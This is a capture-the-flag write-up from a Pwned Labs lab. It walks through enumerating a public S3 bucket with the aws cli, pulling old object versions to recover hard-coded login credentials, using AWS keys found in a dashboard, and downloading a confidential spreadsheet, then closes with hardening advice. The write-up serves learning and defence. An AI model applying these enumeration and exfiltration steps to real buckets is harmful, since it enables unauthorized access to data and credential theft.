Leveraging S3 Bucket Versioning

A walkthrough demonstrating how S3 Bucket Versioning can lead to data exposure and exfiltration.

CTF Source: Pwned Labs

YouTube Walkthrough

Overview

In this walkthrough, we'll discover how improper permissions to S3 Bucket Versioning can lead to unintentional data exposure and exfiltration.

Pre-Requisites

  • Install awscli: brew install awscli (mac) apt install awscli (linux)

Walkthrough

Website Enumeration

We’re given an IP of ⁠16.171.123.169 and after finding an open port on ⁠443⁠, we find a login page in the browser.

Viewing the web page source code, we find an S3 bucket.

Navigating to the root of the S3 bucket, we can see two prefixes ⁠private⁠ and ⁠static

S3 Bucket Enumeration

Let’s try enumerating the bucket with the aws cli.

aws --no-sign-request s3 ls s3://huge-logistics-dashboard --recursive

2023-08-16 12:25:59          0 private/
2023-08-12 13:09:01     833071 static/css/dashboard-free.css.map
2023-08-12 13:09:14     402732 static/css/dashboard.css
2023-08-12 13:09:17        904 static/css/demo.css
2023-08-12 13:09:19       7743 static/css/icons.css
2023-08-12 13:09:19        495 static/css/main.css
2023-08-12 13:08:05      15996 static/images/favicon.ico
[snip]

Let’s see if S3 bucket versioning has been set up.

aws --no-sign-request s3api list-object-versions --bucket huge-logistics-dashboard > bucket_versions.json

Side Quest

We can also use curl on a bucket object to view information about versioning and delete markers.

Amazon has a doc here to learn more about the headers.

In this example, I needed to replace spaces in the xlsx file name with %20 which is called URL Encoding.

curl -I https://huge-logistics-dashboard.s3.eu-north-1.amazonaws.com/private/Business%20Health%20-%20Board%20Meeting%20(Confidential).xlsx

HTTP/1.1 404 Not Found
x-amz-request-id: BA2PQ7K6RPRYS0TQ
x-amz-id-2: leBOpuK9ZZTPrMBqiuiInV9gKvZJ2hw2c4sBeq4+fP8E1WrCmcEGaV3GadMFWWcjun1XYXjzk38=
x-amz-delete-marker: true
x-amz-version-id: whIGcxw1PmPE1Ch2uUwSWo3D5WbNrPIR
Content-Type: application/xml
Date: Sun, 21 Jan 2024 19:24:59 GMT
Server: AmazonS3

Finding Credentials (login page)

Let’s try downloading the latest file (the version without the delete marker) of ⁠Business Health - Board Meeting (Confidential).xlsx

aws --no-sign-request s3api get-object --bucket huge-logistics-dashboard --key "private/Business Health - Board Meeting (Confidential).xlsx" --version-id HPnPmnGr_j6Prhg2K9X2Y.OcXxlO1xm8 board_meeting_latest.xlsx

An error occurred (AccessDenied) when calling the GetObject operation: Access Denied

No dice.

However, there is a newer version of the file ⁠auth.js

If we try downloading the previous file, we’ll find we’re successful and also find credentials!

aws --no-sign-request s3api get-object --bucket huge-logistics-dashboard --key "static/js/auth.js" --version-id qgWpDiIwY05TGdUvTnGJSH49frH_7.yh auth.js      
   
{
    "AcceptRanges": "bytes",
    "LastModified": "2023-08-12T19:13:25+00:00",
    "ContentLength": 463,
    "ETag": "\"7b63218cfe1da7f845bfc7ba96c2169f\"",
    "VersionId": "qgWpDiIwY05TGdUvTnGJSH49frH_7.yh",
    "ContentType": "application/javascript",
    "ServerSideEncryption": "AES256",
    "Metadata": {}
}

Let's read the file contents.

cat auth.js          

$(document).ready(function(){
    $(".btn-login").on("click", login);
});

function login(){
    email = $('#emailForm')[0].value;
    password = $('#passwordForm')[0].value;
    data = {'email':email, 'password':password};
    doLogin(data);
}
//Please remove this after testing. Password change is not necessary to implement so keep this secure!
function test_login(){
        data = {'email':'[snip]', 'password':'[snip]'}
        doLogin(data);
}  

Gaining Access to Webpage & Finding AWS Access Keys

With these credentials, we can log in to the original login page of the website. It appears to be a dashboarding app.

Poking around, we can find plaintext AWS Access Keys!

Finding the Flag!

Before configuring these AWS credentials, we’ll need to know what region we’re working in. Let’s check what region the S3 bucket is in using curl .

curl -I http://huge-logistics-dashboard.s3.eu-north-1.amazonaws.com -s | grep -I 'x-amz-bucket-region'

x-amz-bucket-region: eu-north-1

Great! We’re working in ⁠eu-north-1⁠ region. Let’s set up our new AWS credentials.

aws configure --profile admin
aws --profile admin sts get-caller-identity
{
    "UserId": "AIDATWVWNKAVEJCVKW2CS",
    "Account": "254859366442",
    "Arn": "arn:aws:iam::254859366442:user/data-user"
}

Sweet! Looks like we’re the ⁠data-user⁠. Alright, with our new profile, let’s attempt to download that ⁠xlsx⁠ file again.

aws --profile admin s3api get-object --bucket huge-logistics-dashboard --key "private/Business Health - Board Meeting (Confidential).xlsx" --version-id HPnPmnGr_j6Prhg2K9X2Y.OcXxlO1xm8 board_meeting_latest.xlsx
{
    "AcceptRanges": "bytes",
    "LastModified": "2023-08-16T19:11:03+00:00",
    "ContentLength": 24119,
    "ETag": "\"24f3e7a035c28ef1f75d63a93b980770\"",
    "VersionId": "HPnPmnGr_j6Prhg2K9X2Y.OcXxlO1xm8",
    "ContentType": "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet",
    "ServerSideEncryption": "AES256",
    "Metadata": {}
}

Since I don’t have a program to open CSV files on my kali linux box, I’ll transfer the file over to my Mac.

And here’s the flag!

Wrap Up

So, in this CTF, we discovered an S3-hosted website. Upon enumerating the bucket, we found credentials in an old file version, used those to access a company dashboard tool, and discovered plaintext AWS Access Keys leading to the exfiltration of sensitive company data. Here are some recommended actions administrators can take to prevent this from happening.

  1. Tighten the S3 Bucket Policy

  • “Everyone” could perform ⁠s3:ListBucketVersions⁠ and ⁠s3:GetObjectVersions⁠ leading to the discovery of hard-coded credentials in the file ⁠auth.js⁠ .

  • See below for a potential policy that can be used, and note this would allow access to all bucket contents (see point 2)

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "PublicReadGetObject",
            "Effect": "Allow",
            "Principal": "*",
            "Action": [
                "s3:GetObject"
            ],
            "Resource": [
                "arn:aws:s3:::Bucket-Name/*"
            ]
        }
    ]
}
  1. Eliminate S3 bucket multi-use

  • Using an S3 bucket for multiple purposes can lead to unintended consequences like information disclosure due to a lax or complicated bucket policy.

  • Since this bucket is hosting a publicly accessible website, only store files relevant to the website.

  • If moving data to a new location, ensure any remnants get deleted. The command below can perform this action.

aws s3api delete-object --bucket huge-logistics-dashboard --key "private/Business Health - Board Meeting (Confidential).xlsx" --version-id "HPnPmnGr_j6Prhg2K9X2Y.OcXxlO1xm8"
  1. Ensure employees are trained and have access to a credential manager.

  • In this case, an employee’s AWS Access Keys were found improperly stored in their Dashboard profile

  • Securely store credentials in solutions such as AWS Secrets Manager, HashiCorp Vault, or similar.

Last updated